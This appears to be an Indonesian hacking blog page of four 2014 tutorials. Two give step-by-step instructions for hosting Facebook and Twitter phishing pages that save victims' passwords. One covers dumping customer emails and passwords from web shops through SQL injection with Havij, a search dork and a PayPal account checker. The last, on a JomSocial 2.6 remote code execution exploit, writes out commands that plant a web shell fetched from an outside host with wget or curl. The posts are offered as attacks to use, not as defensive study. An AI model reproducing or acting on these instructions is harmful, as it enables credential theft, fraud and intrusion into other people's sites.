Rabu, 02 April 2014

Hack Facebook Dengan Phising 2014

Hay Fans :p
kali ini mau share tutorial Hack Facebook
kan biasanya pada mau gaya hack facebook nih,langsung saja tutorialnya ya :D

Bahan :
Scipt : Disini!!!

Lanjut Bikin Hostingnya
Oke kalau udah download scriptnya, sekarang tinggal upload ke web aja. Jika belum punya silahkan buat disini.

1. Buat hosting dulu, lalu masuk ke "kelola"


[Image: ynUeFD1.png]


2. Masuk ke file manager

[Image: NOc0EFs.png]


3. Upload file yang sudah di download tadi


[Image: 916EMZj.png]


Setelah itu cek apakah sudah ada masalah atau tidak ?

[Image: 7rkszXi.png]


Untuk contoh website silahkan lihat disini.

Untuk melihat hasilnya nanti akan terupload file "password.txt" jika ada yang login di web phising kalian

[Image: lNHOKJ1.png]


Note : untuk tahun bisa di ganti sendiri, soalnya saya lupa gak ganti wkkw bah
Suwun! Yoo

Dump Paypal Account On Online WebShop

Assamualaikum Sobat 92fightercyber :D
kali ini sedang membahas Dump paypal account on online webshop

lagsung saja ya diperhatikan 
Bahan yang dibutuhkan :

- Havij 1.60
- Paypal checker ( Cari sendiri ya, soalnya gak ada kuasa buat share disini )
- Notepad++ ( atau notepad biasa juga gak masalah )

Langkahnya :

1. Cari ke search engine web yang akan kita jadikan target :

Dork : inurl:/products.php?*=  ( dork bisa dikembangkan sendiri )
2. Buka Havij yang sudah di download tadi, lalu scan web yang kita jadikan target

3. Jika proses sudah selesai klik TABLES ->  Get Tables -> Get Columns  ( Intinya seperti penggunaan havij biasa -> link ) Lalu pilih Columns yang menurut kalian terdapat data-data akun paypal dalam contoh saya memilih columns "tbl_costumer"
4. Diatas tadi, silahkan centang data "email & password" jika sudah keluar, klik save data setelah itu buka dengan browser.
5. Copy Email & password lalu pastekan di Notepad, setelah itu atur menjadi seperti ini
|akun@email.com|password|
6. Setelah itu, buka web PayPal Account Checker lalu pastekan di kolom yang tersedia, setelah itu klik  "Check Now"

Jika yang keluar ada tulisan [ Live ] berati akun kemungkinan bisa digunakan jika [ bad / dead ] berati kemungkinan besar akun tidak bisa digunakan.
Sekian tutorial yang kami berikan, mohon digunakan dengan bijak.
 
visit : IDCA

Hack Akun Twitter Dengam Phising 2014

Download Sciptnya atuh mas Disini
Oke kalau udah download scriptnya, sekarang tinggal upload ke web aja. Jika belum punya silahkan buat disini.

1. Buat hosting dulu, lalu masuk ke "kelola"


[Image: ynUeFD1.png]


2. Masuk ke file manager

[Image: NOc0EFs.png]


3. Upload file yang sudah di download tadi


[Image: 916EMZj.png]


Setelah itu cek apakah sudah ada masalah atau tidak ?

[Image: 7rkszXi.png]


Untuk contoh website silahkan lihat disini.

Untuk melihat hasilnya nanti akan terupload file "password.txt" jika ada yang login di web phising kalian

[Image: lNHOKJ1.png]


Note : untuk tahun bisa di ganti sendiri, soalnya saya lupa gak ganti wkkw bah
Suwun! Yoo

JomSocial 2.6 - Remote Code Execution



Sudah lama tidak membahas mengenai deface mendeface, kesempatan kali ini admin akan memberikan trik deface yaitu "JomSocial 2.6 - Remote Code Execution" langsung saja silahkan simak tutorial dibawah :

JomSoc adalah perangkat komponen joomla yang memungkinkan Anda untuk membuat situs jaringan sosial canggih yang populer bebas penggunaannya dan open source software joomla.

Pada komponen Jomsocial versi 2.6 terdapat bug Rce ( Remote Code Execution ) yang memungkinkan attacker mengeksekusi kode² berbahaya untuk mengeksploitasi web yg memakai komponen ini.

Bahan sebelum beraksi download bahannya :

Exploit
Python 27

Step- step :

♤ Install Python
♤ Open cmd
♤ Masuk dir dimana exploit berada
♤ Jalankan exploit


Perintah:
1. exploit.py -u http://127.0.0.1/index.php -opsi

Macam opsi:
1. u -> url / web target format : http://situs.com/index.php
2. p -> mengeksekusi kode php : "echo 'Hello World!';"
3. s -> mengeksekusi command shell : "netstat -n" dll .
4. c -> menggunakan pemakaian functions : passthru

♤ Cara tanam shell

trik a:
1. exploit.py -u http://127.0.0.1/index.php -s "wget http:situs.com/shell.txt"
2. exploit.py -u http://127.0.0.1/index.php -s "mv shell.txt shell.php"

trik b:
1. exploit.py -u http://127.0.0.1/index.php -s "curl http:situs.com/shell.txt -o shell.php"

Demikian artikel yang dapat kami berikan, artikel ini kami ambil dari User Sanjungan Jiwa di forum kami, jika ada kendala atau masalah saat menjalankan tutorial ini silahkan langsung menuju threadnya disini.

Trimakasih,
Thanks to : Sanjungan Jiwa

Author : Bimo Septiawan